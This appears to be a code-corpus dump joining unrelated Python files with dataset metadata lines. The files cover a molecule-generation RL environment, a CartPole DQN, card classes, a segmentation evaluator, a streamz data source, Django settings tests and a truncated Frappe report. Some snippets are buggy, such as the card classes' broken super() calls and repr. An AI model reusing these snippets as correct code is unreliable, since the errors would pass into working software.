from .Utils import permute_mol, permute_rot, SanitizeNoKEKU, mol_to_graph_full, MolFromGraphsFULL, permuteAtomToEnd
import os
device = None
class ChemEnv(object):
'''
Class which holds logic for graph generation environment
Observations come in the form of (current_graph, last action was node addition, last node features)
'''
def __init__(self, num_node_feats, RewardModule, mol_featurizer, writer):
self.path = './graph_decomp/chunk_'
'''
ENV_Atoms
'''
self.mol_featurizer = mol_featurizer
self.atom_list = ['N','C','O','S','F','Cl','Na','P','Br','Si','B','Se','K', 'Benz','Pyri','Pyrr']
self.atom_bond_dict = {'N':[1,0,5], 'C':[2,0,4], 'O':[3,0,6], 'S':[4,0,6],
'F':[5,0,7], 'Cl' : [6,0,7],'Na':[7,0,7], 'P' : [8,0,5],
'Br':[9,0,7], 'Si' : [10,0,4],'B':[11,0,5], 'Se' : [12,0,6],
'K':[13,0,7]}
'''
ENV_Attributes
'''
self.num_atom_types = self.atom_list.__len__()
self.batch_dim = 1
self.StateSpace = Chem.RWMol()
'''ENV_State'''
self.Done = False
self.last_action_node = torch.zeros((1,1)).to(device)
self.num_node_feats = num_node_feats
self.last_atom_features = torch.zeros(1,self.num_node_feats).to(device)
self.reward = 0
self.log = ""
self.completed_mols = []
self.episode_step_reward = 0
self.num_episodes = 0
self.episode_length = 0
'''
External_Rewards
'''
self.RewardModule = RewardModule
self.model_list = []
self.writer = writer
def __len__(self):
"""size of molecule
Returns:
int: returns size of the molecule
"""
return self.StateSpace.GetNumAtoms()
@property
def n_nodes(self):
return self.StateSpace.GetNumAtoms()
def addStructure(self,mol2):
"""method for adding an entire structure to the molecule
Args:
mol2 (Chem.RWMol): mol to be added to current state space
"""
mol1 = self.StateSpace
add_dif = mol1.GetNumAtoms()
for atom in mol2.GetAtoms():
new_atom = Chem.Atom(atom.GetSymbol())
mol1.AddAtom(new_atom)
for bond in mol2.GetBonds():
a1 = bond.GetBeginAtom().GetIdx()
a2 = bond.GetEndAtom().GetIdx()
bt = bond.GetBondType()
mol1.AddBond(add_dif + a1,add_dif+ a2, bt)
mol1.UpdatePropertyCache()
def addBenzine(self):
"""add benzine ring
"""
mol = Chem.MolFromSmiles('c1ccccc1')
self.addStructure(mol)
def addPyridine(self):
"""add pyridine
"""
mol = Chem.MolFromSmiles('N1=CC=CC=C1')
mol = permute_mol(mol,permute_rot(mol.GetNumAtoms()))
SanitizeNoKEKU(mol)
self.addStructure(mol)
def addPyrrole(self):
"""add Pyrrole
"""
mol = Chem.MolFromSmiles('N1C=CC=C1')
mol = permuteAtomToEnd(mol,0)
self.addStructure(mol)
def addNaptholene(self):
"""add Naptholene
"""
mol = Chem.MolFromSmiles('C1=CC=C2C=CC=CC2=C1')
self.addStructure(mol)
def assignMol(self,mol):
"""method for assigning molecule to state space
Args:
mol ([type]): [description]
"""
mol = Chem.RWMol(mol)
self.StateSpace = mol
self.getObs()
def resetStateSpace(self):
"""a way to reset state space but its bad code
"""
### bad bad bad
while True:
graph_id = random.randint(1,500000) ###so lazy erggg
graph, graph_dict = dgl.load_graphs('./GraphDecomp/graphData/full_chunka',[graph_id])
try:
mol = MolFromGraphsFULL(graph[0])
SanitizeNoKEKU(mol)
break
except:
print('err')
pass
graph = graph[0]
last_action = graph_dict['last_action'][graph_id]
last_atom_feat = graph_dict['last_atom_feats'][graph_id]
mol = MolFromGraphsFULL(graph)
SanitizeNoKEKU(mol)
self.last_action_node = last_action.expand(1,1).to(device)
self.last_atom_features = torch.unsqueeze(last_atom_feat, dim = 0)
self.StateSpace = Chem.RWMol(mol)
def reset(self):
"""reset
Returns:
obs: returns tuple of (graph, last_action_node, node features)
"""
self.resetStateSpace()
self.reward = 0
self.log = ""
self.episode_step_reward = 0
self.episode_length = 0
self.Done = False
graph = self.graphObs()
return graph, self.last_action_node, torch.unsqueeze(graph.ndata['atomic'][-1],dim=0)
def addNode(self, node_choice, give_reward = True):
"""function for adding a node to the state space
Args:
node_choice (str): type of node to add
give_reward (bool, optional): whether to give the reward or not. Defaults to True.
"""
#####figure out last features
if self.last_action_node == 1:
if give_reward:
self.reward -= .1
return
self.last_action_node = torch.ones((1,1)).to(device)
if give_reward:
self.reward+=.1
if node_choice == 'Benz':
self.addBenzine()
elif node_choice == 'Pyri':
self.addPyridine()
elif node_choice == 'Pyrr':
self.addPyrrole()
else:
self.StateSpace.AddAtom(Chem.Atom(node_choice))
def valiateMol(self,mol):
"""method for validating molecules
Args:
mol (Chem.RDMol): Chem molecule
Returns:
bool: whether the molecule is good or not
"""
#check connected
try:
if not nx.is_connected(mol_to_graph_full(mol).to_networkx().to_undirected()):
return False
except:
return False
#check kekulization
try:
Chem.SanitizeMol(mol)
except Chem.rdchem.KekulizeException:
return False
return True
def addEdge(self, edge_type, atom_id, give_reward = True):
"""Method for adding a bond
Args:
edge_type (int): 1 for a single bond, 2 for a double
atom_id (int): which atom to connect to the last atom added
give_reward (bool, optional): whether or not to give reward. Defaults to True.
"""
try:
atom_id = (atom_id).item()
except:
pass
if edge_type == 1:
bond = Chem.rdchem.BondType.SINGLE
elif edge_type == 2:
bond = Chem.rdchem.BondType.DOUBLE
mol_copy = copy.deepcopy(self.StateSpace)
mol_copy.UpdatePropertyCache()
SanitizeNoKEKU(mol_copy)
addable = True
#perform checks
#add bond to complete the rest of the checks
try:
mol_copy.AddBond(atom_id,self.StateSpace.GetNumAtoms()-1,bond)
mol_copy.UpdatePropertyCache()
SanitizeNoKEKU(mol_copy)
except:
addable = False
validated = self.valiateMol(mol_copy)
if validated and addable:
self.StateSpace.AddBond(atom_id,self.StateSpace.GetNumAtoms()-1,bond)
self.StateSpace.UpdatePropertyCache()
Chem.SanitizeMol(self.StateSpace)
self.reward+=.1
self.last_action_node = torch.zeros((self.batch_dim,1))
self.log += ('edge added \n')
else:
self.reward-=.1
def removeUnconnected(self,mol, sanitize = True):
"""method for removing unconnected atoms at evaluation time
Args:
mol (Chem.RWMol()): mol
sanitize (bool, optional): whether or not to sanitize after removal. Defaults to True.
"""
if mol.GetAtomWithIdx(mol.GetNumAtoms()-1).GetDegree() == 0:
mol.RemoveAtom(mol.GetNumAtoms()-1)
else:
if mol.GetNumAtoms() > 6:
if all([mol.GetAtomWithIdx(i).GetDegree() == 2 for i in range(mol.GetNumAtoms()-6,mol.GetNumAtoms())]):
for i in range(self.n_nodes-6,self.n_nodes):
mol.RemoveAtom(self.n_nodes-1)
elif all([mol.GetAtomWithIdx(i).GetDegree() == 2 for i in range(mol.GetNumAtoms()-5,mol.GetNumAtoms())]):
for i in range(self.n_nodes-5,self.n_nodes):
mol.RemoveAtom(self.n_nodes-1)
self.StateSpace.UpdatePropertyCache()
if sanitize:
Chem.SanitizeMol(self.StateSpace)
def checkValence(self, atom_id, edge_type):
"""check if valences are ok before adding. Should be looked at
Args:
atom_id (int): atom to check
edge_type (int): single or double bond
Returns:
bool: whether it passes
"""
atom = self.StateSpace.GetAtomWithIdx(atom_id)
currValence = atom.GetExplicitValence()
maxValence = 8 - self.atom_bond_dict[atom.GetSymbol()][-1]
return currValence + edge_type > maxValence
def modelRewards(self, mol):
"""rewards agent
Args:
mol (Chem.RWMol): mol to evaluate
Returns:
float: score
"""
return self.RewardModule.GiveReward(mol)
def graphObs(self):
"""get graph from molecule
Returns:
graph: converted molecule
"""
self.StateSpace.UpdatePropertyCache()
return dgl.add_self_loop(dgl.remove_self_loop(self.mol_featurizer(self.StateSpace))).to(device)
def getObs(self):
"""get state
Returns:
state: observations
"""
graph = self.graphObs()
self.last_atom_feats = torch.unsqueeze(graph.ndata['atomic'][-1],dim=0)
if nx.is_connected(graph.cpu().to_networkx().to_undirected()):
self.last_action_node = torch.zeros((1,1)).to(device)
else:
self.last_action_node = torch.ones((1,1)).to(device)
return graph, self.last_action_node, self.last_atom_feats
def step(self, action, final_step = False, verbose = False):
"""single step in env
Args:
action (int): what action
final_step (bool, optional): whether it is the final step. Defaults to False.
verbose (bool, optional): amount of logging. Defaults to False.
Returns:
float: returns relavent info for PPO
"""
self.TempSmiles = Chem.MolToSmiles(self.StateSpace)
self.episode_length += 1
reward_dict_info = {'model_reward':0, 'property_reward':0, 'step_reward':0} #info for different rewards for logging
self.reward = 0
self.log = ""
terminated = False
#case for termination
if action == 0:
self.log += 'terminating \n'
self.Done = True
terminated = True
'''final rewards '''
#case for adding a node
elif action > 0 and action < self.num_atom_types+1:
self.log += ("------adding "+ self.atom_list[action-1] +" atom------ \n")
self.addNode(self.atom_list[action-1])
SanitizeNoKEKU(self.StateSpace)
#case for edge addition
elif action < 1 + self.num_atom_types + (2*self.__len__()):
destination_atom_idx = (action - len(self.atom_list) - 1) // 2
edge_type = (action - self.num_atom_types - 1)%2 + 1
self.log +=("------attempting to add " + str(edge_type) + " bond between last atom added and atom "+ str(destination_atom_idx) +"------ \n")
self.addEdge(edge_type,destination_atom_idx)
else:
self.log += "------action id is too large for state space------ \n"
reward_dict_info['step_reward'] = self.reward
self.episode_step_reward += self.reward
if final_step:
terminated = True
if terminated:
self.removeUnconnected(self.StateSpace,sanitize=False)
self.writer.add_scalar("Average Step Reward", self.episode_step_reward/self.episode_length, self.num_episodes)
self.writer.add_scalar("Episode Length", self.episode_length, self.num_episodes)
model_rewards = self.modelRewards(self.StateSpace)
self.reward+= model_rewards
self.num_episodes += 1
if verbose:
print(self.log)
self.StateSpace.UpdatePropertyCache()
SanitizeNoKEKU(self.StateSpace)
obs = self.getObs()
return obs, self.reward, self.Done, reward_dict_info
| 1.960938
| 2
|
NewsSentiment/knowledge/knowledgeutils.py
|
jamie-iai/NewsMTSC
| 46
|
12783936
|
def find_key_original_or_lc(data: dict, data_keys_lower: dict, key: str):
# try to get the key as it is from the dict
if key in data.keys():
return data[key]
# if not contained, try whether if using case insensitivity we find an entry
if key.lower() in data_keys_lower.keys():
return data_keys_lower[key.lower()]
# if not, return None
return set()
| 3.328125
| 3
|
buildcage/__init__.py
|
Zhang-Dante/buildcage
| 0
|
12783937
|
<reponame>Zhang-Dante/buildcage
from buildcage import src
| 0.929688
| 1
|
basic_algorithms/DQN.py
|
ChrisRanger/RL_study
| 0
|
12783938
|
import numpy as np
import os
import gym
import torch
import torch.nn as nn
import collections
import copy
import random
# hype-params
learn_freq = 5 #经验池攒一些经验再开启训练
buffer_size = 20000 #经验池大小
buffer_init_size = 200 #开启训练最低经验条数
batch_size = 32 #每次sample的数量
learning_rate = 0.001 #学习率
GAMMA = 0.99 # reward折扣因子
class Model(nn.Module):
def __init__(self, act_dim, state_dim):
super(Model, self).__init__()
hidden1_size = 128
hidden2_size = 128
self.input_layer = nn.Linear(state_dim, hidden1_size)
self.input_layer.weight.data.normal_(0, 0.1)
self.hidden_layer = nn.Linear(hidden1_size, hidden2_size)
self.hidden_layer.weight.data.normal_(0, 0.1)
self.output_layer = nn.Linear(hidden2_size, act_dim)
self.output_layer.weight.data.normal_(0, 0.1)
def forward(self, state):
h1 = nn.functional.relu(self.input_layer(state))
h2 = nn.functional.relu(self.hidden_layer(h1))
Q = self.output_layer(h2)
return Q
class DQN:
def __init__(self, model, act_dim=None, gamma=None, lr=None):
self.model = model
self.target_model = copy.deepcopy(model)
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=learning_rate)
self.loss = nn.MSELoss()
self.act_dim = act_dim
self.lr = lr
self.gamma = gamma
def predict(self, state):
return self.model.forward(state) # shape: batch_size x act_dim
def learn(self, state, action, reward, state_next, done): # shape: batch_size x 1
# 根据target网络求target Q
next_values = self.target_model.forward(state_next).detach() # 阻断target梯度, shape: batch_size x act_dim
target_value = reward + (1.0 - done)*self.gamma*next_values.max(1)[0] # shape: batch_size x 1
# 根据当前网络获取Q(s, a)
curr_value = self.model.forward(state)
action = action.unsqueeze(1)
pred_value = torch.gather(curr_value, 1, action.long()) # batch_size x act_dim中以第二维取action对应的Q值成为batch_size x 1
cost = self.loss(pred_value, target_value)
self.optimizer.zero_grad()
cost.backward()
self.optimizer.step()
return cost
def update_target(self):
self.target_model.load_state_dict(self.model.state_dict()) # 更新target网络参数
class ReplayMemory(object):
def __init__(self, max_size):
self.buffer = collections.deque(maxlen=max_size)
def append(self, exp):
self.buffer.append(exp)
def sample(self, batch_size):
batch = random.sample(self.buffer, batch_size)
state_batch, action_batch, reward_batch, state_netx_batch, done_batch = [], [], [], [], []
for exp in batch:
s, a, r, s_next, done = exp
state_batch.append(s)
action_batch.append(a)
reward_batch.append(r)
state_netx_batch.append(s_next)
done_batch.append(done)
return torch.from_numpy(np.array(state_batch).astype('float32')), \
torch.from_numpy(np.array(action_batch).astype('int32')), \
torch.from_numpy(np.array(reward_batch).astype('float32')), \
torch.from_numpy(np.array(state_netx_batch).astype('float32')), \
torch.from_numpy(np.array(done_batch).astype('float32'))
def __len__(self):
return len(self.buffer)
class Agent:
def __init__(self, algorithm, state_dim, act_dim, epsilon=0.1, epsilon_fade=0.0):
self.dqn = algorithm
self.state_dim = state_dim
self.act_dim = act_dim
self.steps = 0
self.update_target_steps = 200
self.epsilon = epsilon
self.epsilon_fade = epsilon_fade
def explore(self, state):
sample = np.random.rand()
if sample < self.epsilon:
action = np.random.randint(self.act_dim)
else:
action = self.greedy(state)
self.epsilon = max(0.01, self.epsilon - self.epsilon_fade)
return action
def greedy(self, state):
state = torch.from_numpy(state)
state = torch.tensor(state, dtype=torch.float32)
pred_value = self.dqn.target_model.forward(state)
values = pred_value.detach().numpy()
values = np.squeeze(values, axis=None)
action = np.argmax(values) # 选择值最大的下标
return action
def learn(self, state, action, reward, state_next, done):
if self.steps % self.update_target_steps == 0:
self.dqn.update_target()
self.steps += 1
cost = self.dqn.learn(state, action, reward, state_next, done)
return cost
def evaluate(env, agent, render=True):
eval_reward = []
for i in range(10):
state = env.reset()
episode_reward = 0
while True:
action = agent.greedy(state)
state, reward, done, _ = env.step(action)
episode_reward += reward
if render:
env.render()
if done:
break
eval_reward.append(episode_reward)
return np.mean(eval_reward)
if __name__ == '__main__':
env = gym.make('CartPole-v0')
action_dim = env.action_space.n
state_dim = env.observation_space.shape[0]
exp_buffer = ReplayMemory(buffer_size)
model = Model(act_dim=action_dim, state_dim=state_dim)
algorithm = DQN(model, act_dim=action_dim, gamma=GAMMA, lr=learning_rate)
agent = Agent(algorithm, state_dim=state_dim, act_dim=action_dim, epsilon=0.1, epsilon_fade=1e-6)
state = env.reset()
while(len(exp_buffer)<buffer_init_size):
action = agent.explore(state)
state_next, reward, done, _ = env.step(action)
exp_buffer.append((state, action, reward, state_next, done))
state = state_next
if done:
state = env.reset()
episode = 0
while episode < 20000:
for i in range(0, 100):
episode += 1
total_reward = 0
state = env.reset()
step = 0
while True:
step += 1
action = agent.explore(state)
state_next, reward, done, _ = env.step(action)
# env.render()
exp_buffer.append((state, action, reward, state_next, done))
# train
if len(exp_buffer) > buffer_init_size and step%learn_freq == 0:
(state_batch, action_batch, reward_batch, state_next_batch, done_batch) = exp_buffer.sample(batch_size)
loss = agent.learn(state_batch, action_batch, reward_batch, state_next_batch, done_batch)
total_reward += reward
state = state_next
if done:
break
eval_reward = evaluate(env, agent, render=True)
print('episode: %d e_greed: %.5f test_reward: %.1f' %(episode, agent.epsilon, eval_reward))
torch.save(agent.dqn.target_model, './dqn.pkl')
| 2.828125
| 3
|
common/cards.py
|
castellanprime/Discard
| 0
|
12783939
|
class Card:
def __init__(self, card_colour, other_colour):
self.card_colour = card_colour
self.other_colour = other_colour
def __repr__(self):
return "{0}:{1}".format(self.card_colour, self.other_colour)
class NormalCard(Card):
def __init__(self, card_colour, shape_colour, shape):
super().__init__(self, card_colour, shape_colour)
self.shape = shape
def __repr__(self):
return "[{0} {1}]".format(self.shape, super().__repr__())
class SpecialCard(Card):
def __init__(self, card_colour, char_colour, char,
is_blockable=False, is_stackable=False):
super().__init__(self, card_colour, char_colour)
self.char = char
self.is_blockable = is_blockable
self.is_stackable = is_stackable
def __repr__(self):
return "[{0} {1}]".format(self.shape, super().__repr__())
| 3.28125
| 3
|
evaluate_VOC_val.py
|
briqr/CSPN
| 17
|
12783940
|
# You can use this code to evaluate the trained model of CSPN on VOC validation data, adapted from SEC
import numpy as np
import pylab
import scipy.ndimage as nd
import imageio
from matplotlib import pyplot as plt
from matplotlib import colors as mpl_colors
import krahenbuhl2013
import sys
sys.path.insert(0,'/home/briq/libs/caffe/python')
import caffe
import scipy
caffe.set_device(0)
caffe.set_mode_gpu()
voc_classes = [ 'background',
'aeroplane',
'bicycle',
'bird',
'boat',
'bottle',
'bus',
'car',
'cat',
'chair',
'cow',
'diningtable',
'dog',
'horse',
'motorbike',
'person',
'pottedplant',
'sheep',
'sofa',
'train',
'tvmonitor',
]
max_label = 20
mean_pixel = np.array([104.0, 117.0, 123.0])
palette = [(0.0, 0.0, 0.0), (0.5, 0.0, 0.0), (0.0, 0.5, 0.0), (0.5, 0.5, 0.0),
(0.0, 0.0, 0.5), (0.5, 0.0, 0.5), (0.0, 0.5, 0.5), (0.5, 0.5, 0.5),
(0.25, 0.0, 0.0), (0.75, 0.0, 0.0), (0.25, 0.5, 0.0), (0.75, 0.5, 0.0),
(0.25, 0.0, 0.5), (0.75, 0.0, 0.5), (0.25, 0.5, 0.5), (0.75, 0.5, 0.5),
(0.0, 0.25, 0.0), (0.5, 0.25, 0.0), (0.0, 0.75, 0.0), (0.5, 0.75, 0.0),
(0.0, 0.25, 0.5)]
my_cmap = mpl_colors.LinearSegmentedColormap.from_list('Custom cmap', palette, 21)
def preprocess(image, size, mean_pixel=mean_pixel):
image = np.array(image)
image = nd.zoom(image.astype('float32'),
(size / float(image.shape[0]),
size / float(image.shape[1]), 1.0),
order=1)
image = image[:, :, [2, 1, 0]]
image = image - mean_pixel
image = image.transpose([2, 0, 1])
return image
def predict_mask(image_file, net, smooth=True):
im = pylab.imread(image_file)
net.blobs['images'].data[0] = preprocess(im, 321)
net.forward()
scores = np.transpose(net.blobs['fc8-SEC'].data[0], [1, 2, 0])
d1, d2 = float(im.shape[0]), float(im.shape[1])
scores_exp = np.exp(scores - np.max(scores, axis=2, keepdims=True))
probs = scores_exp / np.sum(scores_exp, axis=2, keepdims=True)
probs = nd.zoom(probs, (d1 / probs.shape[0], d2 / probs.shape[1], 1.0), order=1)
eps = 0.00001
probs[probs < eps] = eps
if smooth:
result = np.argmax(krahenbuhl2013.CRF(im, np.log(probs), scale_factor=1.0), axis=2)
else:
result = np.argmax(probs, axis=2)
return result
def evaluate(res, gt_img):
intersect_gt_res = np.sum( (res == gt_img) & (res!=0) & (gt_img!=0) )
union_gt_res = np.sum( (res!=0) | (gt_img!=0) )
acc = float(intersect_gt_res) / union_gt_res
return acc
model = '/home/briq/libs/CSPN/training/models/model_iter_3000.caffemodel'
draw = False
smoothing = True
if __name__ == "__main__":
num_classes = len(voc_classes)
gt_path = '/media/datasets/VOC2012/SegmentationClassAug/'
orig_img_path = '/media/datasets/VOC2012/JPEGImages/'
img_list_path = '/home/briq/libs/CSPN/list/val_id.txt'
with open(img_list_path) as f:
content = f.readlines()
f.close()
content = [x.strip() for x in content]
num_ims = 0
cspn_net = caffe.Net('deploy.prototxt', model, caffe.TEST)
for line in content:
img_name = line.strip()
gt_name = gt_path + img_name
gt_name = gt_name + '.png'
gt_img = imageio.imread(gt_name)
orig_img_name = orig_img_path + img_name
orig_img_name = orig_img_name + '.jpg'
res = predict_mask(orig_img_name, cspn_net, smooth=smoothing)
num_ims += 1
if(num_ims%100==0):
print '-----------------im:{}---------------------\n'.format(num_ims)
acc = evaluate(res, gt_img)
print img_name, str(num_ims), "{}%\n".format(acc*100)
if draw:
fig = plt.figure()
ax = fig.add_subplot('221')
ax.imshow(pylab.imread(orig_img_name))
plt.title('image')
ax = fig.add_subplot('222')
ax.matshow(gt_img, vmin=0, vmax=21, cmap=my_cmap)
plt.title('GT')
ax = fig.add_subplot('223')
ax.matshow(res, vmin=0, vmax=21, cmap=my_cmap)
plt.title('CSPN')
plt.show()
| 2.296875
| 2
|
example_snippets/multimenus_snippets/Snippets/SciPy/Physical and mathematical constants/CODATA physical constants/P/proton mass energy equivalent in MeV.py
|
kuanpern/jupyterlab-snippets-multimenus
| 0
|
12783941
|
<filename>example_snippets/multimenus_snippets/Snippets/SciPy/Physical and mathematical constants/CODATA physical constants/P/proton mass energy equivalent in MeV.py
constants.physical_constants["proton mass energy equivalent in MeV"]
| 1.265625
| 1
|
demo/due-server/servo.py
|
wovo/hwpy
| 0
|
12783942
|
<reponame>wovo/hwpy<filename>demo/due-server/servo.py
"""
Demo for a hobby servo
"""
import sys, time
sys.path.append( "../.." )
import hwpy
print( __doc__ )
servo = hwpy.servo( hwpy.gpo( hwpy.arduino.d2 ))
while True:
for x in range( 0, 100, 5 ):
servo.write( x / 100.0 )
time.sleep( 0.1 )
for x in range( 100, 0, -5 ):
servo.write( x / 100.0 )
time.sleep( 0.1 )
| 2.75
| 3
|
intake_streamz/source.py
|
martindurant/intake-streamz
| 7
|
12783943
|
from intake.source.base import DataSource
from intake.source import import_name
class StreamzSource(DataSource):
name = 'streamz'
container = 'streamz'
"""
"""
def __init__(self, method_chain, start=False, metadata=None, **kwargs):
"""
method_chain: list[tuple(str, dict)]
Each element of the list is like (method_name, kwargs)
which will be applied to the stream object in sequence.
"""
self.method = method_chain
self.kwargs = kwargs
self.stream = None
self.start = start
super().__init__(metadata=metadata)
def _get_schema(self):
import streamz
if self.stream is None:
stream = streamz.Stream
for part in self.method:
kw = part.get("kwargs", {})
for functional in part.get("func_value", []):
kw[functional] = import_name(kw[functional])
stream = getattr(stream, part["method"])(**part.get("kwargs", {}))
self.stream = stream
if self.start:
self.stream.start()
return {'stream': str(self.stream)}
def read(self):
self._get_schema()
return self.stream
def to_dask(self):
return self.read().scatter()
@property
def plot(self):
# override since there is no hvPlot(streamz), only streamz.hvPlot
try:
from hvplot import hvPlot
except ImportError:
raise ImportError("The intake plotting API requires hvplot."
"hvplot may be installed with:\n\n"
"`conda install -c pyviz hvplot` or "
"`pip install hvplot`.")
fields = self.metadata.get('fields', {})
for attrs in fields.values():
if 'range' in attrs:
attrs['range'] = tuple(attrs['range'])
s = self.read()
plot = s.plot
plot._metadata['fields'] = fields
plot._plots = self.metadata.get('plots', {})
s.start()
return plot
| 2.390625
| 2
|
code_styles/generate_styles.py
|
tylerbutler/shared_assets
| 0
|
12783944
|
# coding=utf-8
from pygments.formatters.html import HtmlFormatter
from pygments.styles import get_all_styles
__author__ = '<NAME> <<EMAIL>>'
'''
Run this script to output all registered Pygments styles as flat CSS files in the current directory.
Other styles that can be installed using pip:
pygments-style-github
pygments-style-railscasts
And some can be installed/downloaded manually...
https://github.com/john2x/solarized-pygment
https://github.com/brolewis/pygments_zenburn
https://github.com/oblique/pygments-style-behelit
https://github.com/idleberg/base16-pygments
'''
def main():
for style in get_all_styles():
formatter = HtmlFormatter(style=style)
css = formatter.get_style_defs()
filename = '%s.css' % style
with open(filename, mode='wb') as the_file:
the_file.writelines(css)
print "Output %s" % filename
if __name__ == '__main__':
main()
| 2.453125
| 2
|
gssapi/raw/named_tuples.py
|
E-Tahta/python-gssapi
| 2
|
12783945
|
from collections import namedtuple
AcquireCredResult = namedtuple('AcquireCredResult',
['creds', 'mechs', 'lifetime'])
InquireCredResult = namedtuple('InquireCredResult',
['name', 'lifetime', 'usage',
'mechs'])
InquireCredByMechResult = namedtuple('InquireCredByMechResult',
['name', 'init_lifetime',
'accept_lifetime', 'usage'])
AddCredResult = namedtuple('AddCredResult',
['creds', 'mechs', 'init_lifetime',
'accept_lifetime'])
DisplayNameResult = namedtuple('DisplayNameResult',
['name', 'name_type'])
WrapResult = namedtuple('WrapResult',
['message', 'encrypted'])
UnwrapResult = namedtuple('UnwrapResult',
['message', 'encrypted', 'qop'])
AcceptSecContextResult = namedtuple('AcceptSecContextResult',
['context', 'initiator_name',
'mech', 'token', 'flags', 'lifetime',
'delegated_creds', 'more_steps'])
InitSecContextResult = namedtuple('InitSecContextResult',
['context', 'mech', 'flags', 'token',
'lifetime', 'more_steps'])
InquireContextResult = namedtuple('InquireContextResult',
['initiator_name', 'target_name',
'lifetime', 'mech', 'flags',
'locally_init', 'complete'])
StoreCredResult = namedtuple('StoreCredResult',
['mechs', 'usage'])
IOVUnwrapResult = namedtuple('IOVUnwrapResult',
['encrypted', 'qop'])
InquireNameResult = namedtuple('InquireNameResult',
['attrs', 'is_mech_name', 'mech'])
GetNameAttributeResult = namedtuple('GetNamedAttributeResult',
['values', 'display_values',
'authenticated', 'complete'])
| 2.046875
| 2
|
cos_tests/test_base.py
|
baylee-d/cos.io
| 0
|
12783946
|
<reponame>baylee-d/cos.io
import pytest # noqa
from django.test import TestCase
import website.settings.base as base
import os
from urllib.parse import urlparse
class VariableValueTest(TestCase):
def test_project_dir(self):
""" Checks that the directory for the project is pointing to the right place """
test_project_directory = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + "/website"
project_directory = base.PROJECT_DIR
self.assertEqual(project_directory, test_project_directory, 'the project directories were not equal')
def test_base_dir(self):
""" Checks that the base directory is pointing to the right place """
test_base_directory = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
base_directory = base.BASE_DIR
self.assertEqual(base_directory, test_base_directory, 'the base directories were not equal')
def test_email_host(self):
""" Checks that the email host is correct """
test_email_host = 'smtp.sendgrid.net'
email_host = base.EMAIL_HOST
self.assertEqual(email_host, test_email_host, 'email hosts were not equal')
def test_email_host_user(self):
""" Checks that the email_host_user variable is correct """
test_email_host_user = os.environ.get('SENDGRID_USERNAME')
email_host_user = base.EMAIL_HOST_USER
self.assertEqual(email_host_user, test_email_host_user, 'email host users were not equal')
def test_email_host_password(self):
""" Checks that the email host password is correct """
test_email_host_pass = os.environ.get('SENDGRID_PASSWORD')
email_host_pass = base.EMAIL_HOST_PASSWORD
self.assertEqual(email_host_pass, test_email_host_pass, 'email user passwords were not equal')
def test_email_port(self):
""" Checks the email port """
email_port = base.EMAIL_PORT
self.assertEqual(email_port, 587)
def test_email_use_tls(self):
""" Checks the property """
email_use_tls = base.EMAIL_USE_TLS
self.assertEqual(email_use_tls, True)
def test_es_url(self):
""" Checks the variable """
test_es_url = urlparse(os.environ.get('BONSAI_URL') or 'http://127.0.0.1:9200/')
es_url = base.ES_URL
self.assertEqual(es_url, test_es_url, 'the es_urls did not match')
def test_haystack_connections(self):
""" Checks the condition that there is or isn't an es_url_username """
es_url = urlparse(os.environ.get('BONSAI_URL') or 'http://127.0.0.1:9200/')
test_haystack_connections = {
'default': {
'ENGINE': 'haystack.backends.elasticsearch_backend.'
'ElasticsearchSearchEngine',
'URL': es_url.scheme + '://' + es_url.hostname + ':9200',
'INDEX_NAME': 'haystack',
},
}
if es_url.username:
test_haystack_connections['default']['KWARGS'] = {
"http_auth": es_url.username + ':' + es_url.password}
haystack_connections = base.HAYSTACK_CONNECTIONS
self.assertEqual(haystack_connections, test_haystack_connections, 'the es_url did not have a username, resulting in no haystack connections')
def test_site_id(self):
""" Checks that the site id is equal to the site id of the environment """
test_site_id = os.environ.get('SITE_ID')
site_id = base.SITE_ID
self.assertEqual(site_id, test_site_id, 'the site ids were not equal')
def test_redis_url(self):
""" Checks the redis url """
test_redis_url = urlparse(os.environ.get('REDIS_URL') or 'http://127.0.0.1:6379')
redis_url = base.redis_url
self.assertEqual(redis_url, test_redis_url, 'the redis urls were not equal')
def test_caches(self):
""" Tests that the redis caches point to the right places """
caches = {
"default": {
"BACKEND": "redis_cache.RedisCache",
"LOCATION": "{0}:{1}".format(base.redis_url.hostname, base.redis_url.port),
"OPTIONS": {
"PASSWORD": base.redis_url.password,
"DB": 0,
}
}
}
base_caches = base.CACHES
self.assertEqual(base_caches, caches, 'the cache information was not equal')
def test_static_file_dirs(self):
""" Tests that the location of the static directory files is correct """
staticfiles_dirs = [
os.path.join(base.PROJECT_DIR, 'static'),
]
base_staticfiles_dirs = base.STATICFILES_DIRS
self.assertEqual(base_staticfiles_dirs, staticfiles_dirs, 'static file directories were not the same')
def test_static_root(self):
""" Tests the location of the static root """
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
test_static_root = os.path.join(base_dir, 'static')
static_root = base.STATIC_ROOT
self.assertEqual(static_root, test_static_root, 'static roots were not equal to each other')
def test_media_root(self):
""" Tests the location of the media root """
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
test_media_root = os.path.join(base_dir, 'media')
media_root = base.MEDIA_ROOT
self.assertEqual(media_root, test_media_root, 'media roots were not equal to each other')
def test_base_url(self):
""" Tests the base url for the wagtail site to make sure it goes to the cos.io site """
base_url = base.BASE_URL
self.assertEqual(base_url, 'http://cos.io')
| 2.71875
| 3
|
optic_store/optic_store/report/salary_report_for_bank/salary_report_for_bank.py
|
iptelephony/optic_store
| 14
|
12783947
|
<gh_stars>10-100
# Copyright (c) 2013, 9T9IT and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from functools import partial
from toolz import compose, pluck, concatv, merge, groupby, excepts, first
from optic_store.utils import pick
from optic_store.utils.report import make_column, with_report_generation_time
def execute(filters=None):
columns = _get_columns(filters)
keys = compose(list, partial(pluck, "fieldname"))(columns)
clauses, values = _get_filters(filters)
data = _get_data(clauses, values, keys)
return columns, data
def _get_columns(filters):
return [
make_column("bank_name", "BANK CODE", width=90),
make_column("bank_ac_no", "CREDIT ACCOUNT NO", width=150),
make_column("employee_name", "EMP NAME", width=150),
make_column("amount", "AMOUNT", type="Currency"),
make_column("remarks", "REMARKS", width=150),
make_column("placeholder1", "PAYMENT_PRODUCT"),
make_column("placeholder2", "TXN_CCY"),
make_column("placeholder3", "SWIFT_CHARGING_OPT"),
make_column("placeholder3", "PAYMENT_VALUE_DATE"),
make_column("account_number", "DEBIT_ACCOUNT NUMBER", width=150),
]
def _get_filters(filters):
